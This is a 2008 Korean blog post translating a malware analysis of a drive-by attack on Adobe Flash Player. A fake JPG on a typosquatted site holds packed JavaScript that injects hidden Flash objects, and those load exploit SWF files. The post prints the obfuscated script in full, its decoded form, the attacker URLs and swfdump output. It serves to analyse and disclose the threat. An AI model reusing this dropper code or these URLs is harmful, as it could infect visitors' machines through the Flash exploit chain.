2008년 08월 28일
Malicious swf
원문을 번역해서 올립니다.
http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.jpg
이 JPG는 실제로는 아래와 같은 스크립트임
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':
e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia|download|align|flash|swflash||version'.split('|'),0,{}))
이것을 다시 디코딩하면 아래와 같다.
if(document.cookie.indexOf("playon=")==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);
document.cookie="playon=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0){document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0"
width="0" height="0" align="middle">');document.write('<param name="allowScriptAccess" value="sameDomain"/>');document.write('<param name="movie" value="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('</object>')}else{document.write
("<EMBED src=hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/08.swf width=0 height=0>")}}
여기서 주목해야 할 것은 file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9
Virustotal shows 0/32 for both files.
이 SWF를 분석하면 다음과 같다.(분석툴 SWFDUMP)
C:\swfdump -D 08.swf
[HEADER] File version: 9
[HEADER] File is zlib compressed. Ratio: 96%
[HEADER] File size: 208 (Depacked)
[HEADER] Frame rate: 12.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 1.00
[HEADER] Movie height: 1.00
[045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018] 31 PROTECT
[00c00c] 138 DOACTION
( 99 bytes) action: Constantpool(5 entries)
String:"flashVersion" String:"/:$version"
String:"http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/"
String:"ff.swf" String:"_root"
( 4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
( 0 bytes) action: GetVariable
( 0 bytes) action: DefineLocal
( 4 bytes) action: Push Lookup:2
("http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/")
Lookup:0 ("flashVersion")
( 0 bytes) action: GetVariable
( 0 bytes) action: Add2
( 2 bytes) action: Push Lookup:3 ("ff.swf")
( 0 bytes) action: Add2
( 2 bytes) action: Push Lookup:4 ("_root")
( 0 bytes) action: GetVariable
( 1 bytes) action: GetUrl2 64
( 0 bytes) action: Stop
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END
SWF 파일의 실제 아래와 같은 URL에서 구동됨
http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ff.swf
http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ie.swf
iles have been removed, or are looking for a different version of the player.
이 취약점 공격은 어도비 플래쉬 플레어 취약점을 공격하는 과정을 분석한 것이다.
Cheers,
Adrien de Beaupre
Bell Canada
# by | 2008/08/28 22:49 | Security 일반
